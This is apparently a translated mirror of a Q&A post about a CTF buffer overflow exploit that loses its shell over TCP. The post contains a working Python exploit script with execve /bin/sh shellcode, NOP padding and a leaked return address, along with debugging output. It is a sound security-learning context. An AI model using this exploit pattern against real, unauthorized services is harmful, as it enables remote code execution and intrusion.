繁体   English   中英

缓冲区溢出漏洞利用 TCP 不会保持外壳打开

[英]Buffer Overflow Exploit over using TCP won't keep shell open

我为这个 CTF 的远程机器制作了一个缓冲区溢出漏洞利用。 挑战打印出一个地址,然后您必须使用该地址才能知道您的 shellcode 存储在哪里。 附上我当前的漏洞利用代码:

if len(sys.argv) != 3:
    print "Usage: %s host port" % (sys.argv[0])
    sys.exit(0)

s = socket.create_connection([sys.argv[1], int(sys.argv[2])])
recieved = s.recv(4096)
print(recieved)
#send 10 bytes of data
s.send("9999\n")
time.sleep(.2)
raw_input("EXPLOIT ?? ")

print s.recv(4096)

sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" 
pad = "\x90" * 251
IP = struct.pack("I",literal_eval(recieved[13:23]))
print("ADDR: ", recieved[13:23])
s.send(sh + pad + IP)

基本上首先我创建连接,然后我发送一个输入,将程序引导到它需要去的地方,以便可以利用(与这个问题无关)

接下来我创建漏洞利用本身

基本前提是:

shellcode + padding + eip

eip 地址来自程序输出给我的地址(这是我在 IP 变量中解析的)

该地址是缓冲区的开始,这是我的 shellcode 开始的地方,也是我想要跳转到的地方。

我正在使用 socat 运行二进制文件,以便它与托管在 CTF 服务器上的挑战相同。 我使用 GDB 附加到该进程,然后运行我的漏洞利用程序。 它成功了,但给出了这个输出:

process 2422 is executing new program: /usr/bin/dash
[Inferior 1 (process 2422) exited normally]
(gdb) 

并且我与该服务的连接已终止。

如果我使用本地二进制文件运行它,我会使用 (python file.py ; cat - ;) | ./program 保持流打开,但这不是一个选项,因为我需要程序输出的内容并且必须远程执行。 我也尝试过使用 Telnet,但随后程序就挂了,什么也没发生。

通过 tmux 运行漏洞利用脚本对我有用。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM